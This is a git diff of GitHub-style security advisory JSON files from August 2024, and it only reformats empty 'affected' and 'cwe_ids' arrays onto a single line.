a/advisories/unreviewed/2024/08/GHSA-68vx-7526-jx2f/GHSA-68vx-7526-jx2f.json b/advisories/unreviewed/2024/08/GHSA-68vx-7526-jx2f/GHSA-68vx-7526-jx2f.json index 75566e54fef..af5183399a6 100644 --- a/advisories/unreviewed/2024/08/GHSA-68vx-7526-jx2f/GHSA-68vx-7526-jx2f.json +++ b/advisories/unreviewed/2024/08/GHSA-68vx-7526-jx2f/GHSA-68vx-7526-jx2f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-6r2r-p6rp-m369/GHSA-6r2r-p6rp-m369.json b/advisories/unreviewed/2024/08/GHSA-6r2r-p6rp-m369/GHSA-6r2r-p6rp-m369.json index eb9c8b78bbc..cf4423a2f3f 100644 --- a/advisories/unreviewed/2024/08/GHSA-6r2r-p6rp-m369/GHSA-6r2r-p6rp-m369.json +++ b/advisories/unreviewed/2024/08/GHSA-6r2r-p6rp-m369/GHSA-6r2r-p6rp-m369.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-7867-7x9c-9gr2/GHSA-7867-7x9c-9gr2.json b/advisories/unreviewed/2024/08/GHSA-7867-7x9c-9gr2/GHSA-7867-7x9c-9gr2.json index f0739fa4c39..50a565c6d1e 100644 --- a/advisories/unreviewed/2024/08/GHSA-7867-7x9c-9gr2/GHSA-7867-7x9c-9gr2.json +++ b/advisories/unreviewed/2024/08/GHSA-7867-7x9c-9gr2/GHSA-7867-7x9c-9gr2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-7mgm-qm5v-f8xw/GHSA-7mgm-qm5v-f8xw.json b/advisories/unreviewed/2024/08/GHSA-7mgm-qm5v-f8xw/GHSA-7mgm-qm5v-f8xw.json index 019b8de752f..93228effbe6 100644 --- a/advisories/unreviewed/2024/08/GHSA-7mgm-qm5v-f8xw/GHSA-7mgm-qm5v-f8xw.json +++ b/advisories/unreviewed/2024/08/GHSA-7mgm-qm5v-f8xw/GHSA-7mgm-qm5v-f8xw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-7p73-rpm9-rwr6/GHSA-7p73-rpm9-rwr6.json b/advisories/unreviewed/2024/08/GHSA-7p73-rpm9-rwr6/GHSA-7p73-rpm9-rwr6.json index 53e7d2ff796..c132c645a59 100644 --- a/advisories/unreviewed/2024/08/GHSA-7p73-rpm9-rwr6/GHSA-7p73-rpm9-rwr6.json +++ b/advisories/unreviewed/2024/08/GHSA-7p73-rpm9-rwr6/GHSA-7p73-rpm9-rwr6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-7w42-j8r5-7jpv/GHSA-7w42-j8r5-7jpv.json b/advisories/unreviewed/2024/08/GHSA-7w42-j8r5-7jpv/GHSA-7w42-j8r5-7jpv.json index 51c13a94684..b8a9aeea317 100644 --- a/advisories/unreviewed/2024/08/GHSA-7w42-j8r5-7jpv/GHSA-7w42-j8r5-7jpv.json +++ b/advisories/unreviewed/2024/08/GHSA-7w42-j8r5-7jpv/GHSA-7w42-j8r5-7jpv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-89fm-3w27-7c7q/GHSA-89fm-3w27-7c7q.json b/advisories/unreviewed/2024/08/GHSA-89fm-3w27-7c7q/GHSA-89fm-3w27-7c7q.json index 42a192bb658..13466f6f8c8 100644 --- a/advisories/unreviewed/2024/08/GHSA-89fm-3w27-7c7q/GHSA-89fm-3w27-7c7q.json +++ b/advisories/unreviewed/2024/08/GHSA-89fm-3w27-7c7q/GHSA-89fm-3w27-7c7q.json @@ -13,9 +13,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-8p32-h9gr-3vrr/GHSA-8p32-h9gr-3vrr.json b/advisories/unreviewed/2024/08/GHSA-8p32-h9gr-3vrr/GHSA-8p32-h9gr-3vrr.json index 833888e6ce7..7615ea5c068 100644 --- a/advisories/unreviewed/2024/08/GHSA-8p32-h9gr-3vrr/GHSA-8p32-h9gr-3vrr.json +++ b/advisories/unreviewed/2024/08/GHSA-8p32-h9gr-3vrr/GHSA-8p32-h9gr-3vrr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-8vgq-3cr6-2jhv/GHSA-8vgq-3cr6-2jhv.json b/advisories/unreviewed/2024/08/GHSA-8vgq-3cr6-2jhv/GHSA-8vgq-3cr6-2jhv.json index 6202217c9cd..f4f4d64c537 100644 --- a/advisories/unreviewed/2024/08/GHSA-8vgq-3cr6-2jhv/GHSA-8vgq-3cr6-2jhv.json +++ b/advisories/unreviewed/2024/08/GHSA-8vgq-3cr6-2jhv/GHSA-8vgq-3cr6-2jhv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-9fx7-c96q-x8pp/GHSA-9fx7-c96q-x8pp.json b/advisories/unreviewed/2024/08/GHSA-9fx7-c96q-x8pp/GHSA-9fx7-c96q-x8pp.json index 7d32455928e..ab7469c2f45 100644 --- a/advisories/unreviewed/2024/08/GHSA-9fx7-c96q-x8pp/GHSA-9fx7-c96q-x8pp.json +++ b/advisories/unreviewed/2024/08/GHSA-9fx7-c96q-x8pp/GHSA-9fx7-c96q-x8pp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-c6fj-cjw5-qrhj/GHSA-c6fj-cjw5-qrhj.json b/advisories/unreviewed/2024/08/GHSA-c6fj-cjw5-qrhj/GHSA-c6fj-cjw5-qrhj.json index 53615941ffe..8b841e23d6d 100644 --- a/advisories/unreviewed/2024/08/GHSA-c6fj-cjw5-qrhj/GHSA-c6fj-cjw5-qrhj.json +++ b/advisories/unreviewed/2024/08/GHSA-c6fj-cjw5-qrhj/GHSA-c6fj-cjw5-qrhj.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-c9xj-qgpm-mj78/GHSA-c9xj-qgpm-mj78.json b/advisories/unreviewed/2024/08/GHSA-c9xj-qgpm-mj78/GHSA-c9xj-qgpm-mj78.json index 237f3f3055c..6f2b6a9bd65 100644 --- a/advisories/unreviewed/2024/08/GHSA-c9xj-qgpm-mj78/GHSA-c9xj-qgpm-mj78.json +++ b/advisories/unreviewed/2024/08/GHSA-c9xj-qgpm-mj78/GHSA-c9xj-qgpm-mj78.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-f245-vq36-rx88/GHSA-f245-vq36-rx88.json b/advisories/unreviewed/2024/08/GHSA-f245-vq36-rx88/GHSA-f245-vq36-rx88.json index 6f74d656c23..b7a48c15b66 100644 --- a/advisories/unreviewed/2024/08/GHSA-f245-vq36-rx88/GHSA-f245-vq36-rx88.json +++ b/advisories/unreviewed/2024/08/GHSA-f245-vq36-rx88/GHSA-f245-vq36-rx88.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-f2xf-9cqf-g2cp/GHSA-f2xf-9cqf-g2cp.json b/advisories/unreviewed/2024/08/GHSA-f2xf-9cqf-g2cp/GHSA-f2xf-9cqf-g2cp.json index ff242ded457..3ff613f8c93 100644 --- a/advisories/unreviewed/2024/08/GHSA-f2xf-9cqf-g2cp/GHSA-f2xf-9cqf-g2cp.json +++ b/advisories/unreviewed/2024/08/GHSA-f2xf-9cqf-g2cp/GHSA-f2xf-9cqf-g2cp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-f7c2-4fxf-c6j7/GHSA-f7c2-4fxf-c6j7.json b/advisories/unreviewed/2024/08/GHSA-f7c2-4fxf-c6j7/GHSA-f7c2-4fxf-c6j7.json index 1b44c2cb0c5..6c2fe0bff22 100644 --- a/advisories/unreviewed/2024/08/GHSA-f7c2-4fxf-c6j7/GHSA-f7c2-4fxf-c6j7.json +++ b/advisories/unreviewed/2024/08/GHSA-f7c2-4fxf-c6j7/GHSA-f7c2-4fxf-c6j7.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-fqv8-f9gv-mjv4/GHSA-fqv8-f9gv-mjv4.json b/advisories/unreviewed/2024/08/GHSA-fqv8-f9gv-mjv4/GHSA-fqv8-f9gv-mjv4.json index a91f1eced25..a5c03cb930d 100644 --- a/advisories/unreviewed/2024/08/GHSA-fqv8-f9gv-mjv4/GHSA-fqv8-f9gv-mjv4.json +++ b/advisories/unreviewed/2024/08/GHSA-fqv8-f9gv-mjv4/GHSA-fqv8-f9gv-mjv4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-g73r-h5v6-mxx2/GHSA-g73r-h5v6-mxx2.json b/advisories/unreviewed/2024/08/GHSA-g73r-h5v6-mxx2/GHSA-g73r-h5v6-mxx2.json index 833907ab1af..06ba94d0450 100644 --- a/advisories/unreviewed/2024/08/GHSA-g73r-h5v6-mxx2/GHSA-g73r-h5v6-mxx2.json +++ b/advisories/unreviewed/2024/08/GHSA-g73r-h5v6-mxx2/GHSA-g73r-h5v6-mxx2.json @@ -13,9 +13,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-gcq8-j4vp-vgvp/GHSA-gcq8-j4vp-vgvp.json b/advisories/unreviewed/2024/08/GHSA-gcq8-j4vp-vgvp/GHSA-gcq8-j4vp-vgvp.json index 4890ce4b980..fd24beb2831 100644 --- a/advisories/unreviewed/2024/08/GHSA-gcq8-j4vp-vgvp/GHSA-gcq8-j4vp-vgvp.json +++ b/advisories/unreviewed/2024/08/GHSA-gcq8-j4vp-vgvp/GHSA-gcq8-j4vp-vgvp.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-gg2p-p8wp-mq7g/GHSA-gg2p-p8wp-mq7g.json b/advisories/unreviewed/2024/08/GHSA-gg2p-p8wp-mq7g/GHSA-gg2p-p8wp-mq7g.json index 2bd391a7295..26c299f4453 100644 --- a/advisories/unreviewed/2024/08/GHSA-gg2p-p8wp-mq7g/GHSA-gg2p-p8wp-mq7g.json +++ b/advisories/unreviewed/2024/08/GHSA-gg2p-p8wp-mq7g/GHSA-gg2p-p8wp-mq7g.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-grh8-rg86-h558/GHSA-grh8-rg86-h558.json b/advisories/unreviewed/2024/08/GHSA-grh8-rg86-h558/GHSA-grh8-rg86-h558.json index 85285c2d69a..77e50bc65b1 100644 --- a/advisories/unreviewed/2024/08/GHSA-grh8-rg86-h558/GHSA-grh8-rg86-h558.json +++ b/advisories/unreviewed/2024/08/GHSA-grh8-rg86-h558/GHSA-grh8-rg86-h558.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:P/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-h6p3-r8c9-wxrq/GHSA-h6p3-r8c9-wxrq.json b/advisories/unreviewed/2024/08/GHSA-h6p3-r8c9-wxrq/GHSA-h6p3-r8c9-wxrq.json index e8cfc60a909..f26e34d2831 100644 --- a/advisories/unreviewed/2024/08/GHSA-h6p3-r8c9-wxrq/GHSA-h6p3-r8c9-wxrq.json +++ b/advisories/unreviewed/2024/08/GHSA-h6p3-r8c9-wxrq/GHSA-h6p3-r8c9-wxrq.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-h7rg-xq25-6vcw/GHSA-h7rg-xq25-6vcw.json b/advisories/unreviewed/2024/08/GHSA-h7rg-xq25-6vcw/GHSA-h7rg-xq25-6vcw.json index 0fc9c733099..4eb58edfb6e 100644 --- a/advisories/unreviewed/2024/08/GHSA-h7rg-xq25-6vcw/GHSA-h7rg-xq25-6vcw.json +++ b/advisories/unreviewed/2024/08/GHSA-h7rg-xq25-6vcw/GHSA-h7rg-xq25-6vcw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-hjr7-xmg8-7xvp/GHSA-hjr7-xmg8-7xvp.json b/advisories/unreviewed/2024/08/GHSA-hjr7-xmg8-7xvp/GHSA-hjr7-xmg8-7xvp.json index a526808bc54..1ff5bce2ebe 100644 --- a/advisories/unreviewed/2024/08/GHSA-hjr7-xmg8-7xvp/GHSA-hjr7-xmg8-7xvp.json +++ b/advisories/unreviewed/2024/08/GHSA-hjr7-xmg8-7xvp/GHSA-hjr7-xmg8-7xvp.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-hq26-4q5q-cj73/GHSA-hq26-4q5q-cj73.json b/advisories/unreviewed/2024/08/GHSA-hq26-4q5q-cj73/GHSA-hq26-4q5q-cj73.json index dc7e7d6db44..ffc74266082 100644 --- a/advisories/unreviewed/2024/08/GHSA-hq26-4q5q-cj73/GHSA-hq26-4q5q-cj73.json +++ b/advisories/unreviewed/2024/08/GHSA-hq26-4q5q-cj73/GHSA-hq26-4q5q-cj73.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-j37c-74rm-9vvc/GHSA-j37c-74rm-9vvc.json b/advisories/unreviewed/2024/08/GHSA-j37c-74rm-9vvc/GHSA-j37c-74rm-9vvc.json index b3a768975cc..5ddb21c5f33 100644 --- a/advisories/unreviewed/2024/08/GHSA-j37c-74rm-9vvc/GHSA-j37c-74rm-9vvc.json +++ b/advisories/unreviewed/2024/08/GHSA-j37c-74rm-9vvc/GHSA-j37c-74rm-9vvc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-m362-99m5-p5fq/GHSA-m362-99m5-p5fq.json b/advisories/unreviewed/2024/08/GHSA-m362-99m5-p5fq/GHSA-m362-99m5-p5fq.json index 518a39c58e9..ca55905e513 100644 --- a/advisories/unreviewed/2024/08/GHSA-m362-99m5-p5fq/GHSA-m362-99m5-p5fq.json +++ b/advisories/unreviewed/2024/08/GHSA-m362-99m5-p5fq/GHSA-m362-99m5-p5fq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-m5fc-grp9-f4c9/GHSA-m5fc-grp9-f4c9.json b/advisories/unreviewed/2024/08/GHSA-m5fc-grp9-f4c9/GHSA-m5fc-grp9-f4c9.json index fa89e091652..2ca64b59a3b 100644 --- a/advisories/unreviewed/2024/08/GHSA-m5fc-grp9-f4c9/GHSA-m5fc-grp9-f4c9.json +++ b/advisories/unreviewed/2024/08/GHSA-m5fc-grp9-f4c9/GHSA-m5fc-grp9-f4c9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-m5r3-95f2-mv6m/GHSA-m5r3-95f2-mv6m.json b/advisories/unreviewed/2024/08/GHSA-m5r3-95f2-mv6m/GHSA-m5r3-95f2-mv6m.json index f129f160365..bc3dbb11416 100644 --- a/advisories/unreviewed/2024/08/GHSA-m5r3-95f2-mv6m/GHSA-m5r3-95f2-mv6m.json +++ b/advisories/unreviewed/2024/08/GHSA-m5r3-95f2-mv6m/GHSA-m5r3-95f2-mv6m.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-mg67-86pg-2ccc/GHSA-mg67-86pg-2ccc.json b/advisories/unreviewed/2024/08/GHSA-mg67-86pg-2ccc/GHSA-mg67-86pg-2ccc.json index 8b741c22cfb..62ebdadc33a 100644 --- a/advisories/unreviewed/2024/08/GHSA-mg67-86pg-2ccc/GHSA-mg67-86pg-2ccc.json +++ b/advisories/unreviewed/2024/08/GHSA-mg67-86pg-2ccc/GHSA-mg67-86pg-2ccc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-mjf8-fqvw-qvr7/GHSA-mjf8-fqvw-qvr7.json b/advisories/unreviewed/2024/08/GHSA-mjf8-fqvw-qvr7/GHSA-mjf8-fqvw-qvr7.json index 6e99479130d..b18ae5e47cc 100644 --- a/advisories/unreviewed/2024/08/GHSA-mjf8-fqvw-qvr7/GHSA-mjf8-fqvw-qvr7.json +++ b/advisories/unreviewed/2024/08/GHSA-mjf8-fqvw-qvr7/GHSA-mjf8-fqvw-qvr7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-mv5c-g9hh-4gc6/GHSA-mv5c-g9hh-4gc6.json b/advisories/unreviewed/2024/08/GHSA-mv5c-g9hh-4gc6/GHSA-mv5c-g9hh-4gc6.json index ac4fa91e68e..a1480a71af6 100644 --- a/advisories/unreviewed/2024/08/GHSA-mv5c-g9hh-4gc6/GHSA-mv5c-g9hh-4gc6.json +++ b/advisories/unreviewed/2024/08/GHSA-mv5c-g9hh-4gc6/GHSA-mv5c-g9hh-4gc6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-mw2p-r6h9-wr7x/GHSA-mw2p-r6h9-wr7x.json b/advisories/unreviewed/2024/08/GHSA-mw2p-r6h9-wr7x/GHSA-mw2p-r6h9-wr7x.json index 31b839a8511..d08ebb80c7b 100644 --- a/advisories/unreviewed/2024/08/GHSA-mw2p-r6h9-wr7x/GHSA-mw2p-r6h9-wr7x.json +++ b/advisories/unreviewed/2024/08/GHSA-mw2p-r6h9-wr7x/GHSA-mw2p-r6h9-wr7x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-pxfg-hh7x-4v6j/GHSA-pxfg-hh7x-4v6j.json b/advisories/unreviewed/2024/08/GHSA-pxfg-hh7x-4v6j/GHSA-pxfg-hh7x-4v6j.json index 99c2ea3f50c..4efc3f3af29 100644 --- a/advisories/unreviewed/2024/08/GHSA-pxfg-hh7x-4v6j/GHSA-pxfg-hh7x-4v6j.json +++ b/advisories/unreviewed/2024/08/GHSA-pxfg-hh7x-4v6j/GHSA-pxfg-hh7x-4v6j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-qw7m-5v7h-8vqf/GHSA-qw7m-5v7h-8vqf.json b/advisories/unreviewed/2024/08/GHSA-qw7m-5v7h-8vqf/GHSA-qw7m-5v7h-8vqf.json index 4fb6b4ae47b..d5d99e10bb8 100644 --- a/advisories/unreviewed/2024/08/GHSA-qw7m-5v7h-8vqf/GHSA-qw7m-5v7h-8vqf.json +++ b/advisories/unreviewed/2024/08/GHSA-qw7m-5v7h-8vqf/GHSA-qw7m-5v7h-8vqf.json @@ -13,9 +13,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-rq5f-wjpw-45r3/GHSA-rq5f-wjpw-45r3.json b/advisories/unreviewed/2024/08/GHSA-rq5f-wjpw-45r3/GHSA-rq5f-wjpw-45r3.json index d35745d2c9c..e08c2a8e6fe 100644 --- a/advisories/unreviewed/2024/08/GHSA-rq5f-wjpw-45r3/GHSA-rq5f-wjpw-45r3.json +++ b/advisories/unreviewed/2024/08/GHSA-rq5f-wjpw-45r3/GHSA-rq5f-wjpw-45r3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-rqx2-8hph-mgmj/GHSA-rqx2-8hph-mgmj.json b/advisories/unreviewed/2024/08/GHSA-rqx2-8hph-mgmj/GHSA-rqx2-8hph-mgmj.json index dbc894e199c..589237bddd3 100644 --- a/advisories/unreviewed/2024/08/GHSA-rqx2-8hph-mgmj/GHSA-rqx2-8hph-mgmj.json +++ b/advisories/unreviewed/2024/08/GHSA-rqx2-8hph-mgmj/GHSA-rqx2-8hph-mgmj.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/08/GHSA-rr8w-2hpq-c6ff/GHSA-rr8w-2hpq-c6ff.json b/advisories/unreviewed/2024/08/GHSA-rr8w-2hpq-c6ff/GHSA-rr8w-2hpq-c6ff.json index 411d76321af..923c469fe11 100644 --- a/advisories/unreviewed/2024/08/GHSA-rr8w-2hpq-c6ff/GHSA-rr8w-2hpq-c6ff.json +++ b/advisories/unreviewed/2024/08/GHSA-rr8w-2hpq-c6ff/GHSA-rr8w-2hpq-c6ff.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-v6j3-vrgp-vmmj/GHSA-v6j3-vrgp-vmmj.json b/advisories/unreviewed/2024/08/GHSA-v6j3-vrgp-vmmj/GHSA-v6j3-vrgp-vmmj.json index 